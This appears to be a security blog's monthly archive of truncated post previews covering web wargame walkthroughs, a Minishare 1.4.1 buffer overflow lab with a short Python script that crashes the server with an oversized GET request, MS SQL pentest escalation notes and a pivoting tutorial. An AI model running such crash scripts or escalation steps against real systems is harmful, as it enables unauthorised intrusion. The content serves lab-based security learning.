Posts

Showing posts from July, 2015

Whitehat Wargame websecurity challenges

Image
Walkthrough of some Web security challenges that are present at Whitehat wargame
https://wargame.whitehat.vn/Challenges/List/2

Note: It is the walkthrough of challenge that is present not at the above link.
It is not a CTF
WebSecurity Challenge Web001


Minishare 1.4.1 Bufferoverflow

Image
You can download the server from:
https://www.dropbox.com/s/zhivgb79wtbce37/minishare-1.4.1.exe?dl=0

Exploit code in ruby:
https://www.exploit-db.com/exploits/616/

The vulnerability is a long URL in the GET request.
Eg:- GET AAAAAAAAAAAAAAAA..... HTTP/1.1

Lab Setup: 1) Windows xp ( I am using windows xp sp1)
2) Immunity debugger installed on the windows xp machine.
3) Minishare 1.4.1 installed on windows xp running on port 80.
2) Kali linux for scripting and exploiting.

Configure the victim: I have installed Minishare server 1.4.1 and it is listening for connections on port 80, as depicted below.


Generate Sample script to crash: We will try to smash the stack by sending a buffer of 2000 A's with the help of the following script.

#!/usr/share/python
import socket,sys
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((sys.argv[1],80))
buff="GET "
buff+="A"*2000
buff+=" HTTP/1.1\r\n\r\n"
s.send(buff)
s.close()


Execute the exploit.It is observed t…

MS SQL Pentest

Image
In few of me internal pentest engagement I was able to enumerate IP and credentials of database server, either by brute-forcing or searching the code for database connect string.

     In last 6months I got the database credentials twice in client side code excluding the successful brute-force.

    Previously when I use to get the credentials, I try to connect the server using a local client. Eg. If I get credentials of MS SQL Server then I download some client for it and try to view the database.

    This time I was not really interested in doing that. Instead I was thinking to escalate my privilege and do something more than just viewing the database, because when I was reading the walk-through of Kioptrix it states that we can gain code execution using some commands executing in sql format.

   So I googled ways to enumerate mssql and I got a very good link https://www.offensive-security.com/metasploit-unleashed/admin-mssql-auxiliary-modules/



Port forwarding and pivoting

Image
"This blog is already published on infosecinstitute"


In computer networking, port forwarding or port mapping is an application of network address translation (NAT) that redirects a communication request from one address and port number combination to another while the packets are traversing a network gateway, such as a router or firewall. This technique is most commonly used to make services on a host residing on a protected or masqueraded (internal) network available to hosts on the opposite side of the gateway (external network), by remapping the destination IP address and port number of the communication to an internal host

More info on Port forwarding

Lab Setup: Requirement
        Three Machine
        1 - Attacker (Kali)
        2 - WinXP
        3 - Linux (Metasploitable or any vulnerable Linux Machine).

Vmware IP Setup
Attacker
        eth0 - (C Class IP) eg. 192.168.1.104
WinXP
        1 Ethernet - (C Class IP) eg.1 92.168.1.131
        2 Ethernet - (A Class IP) e…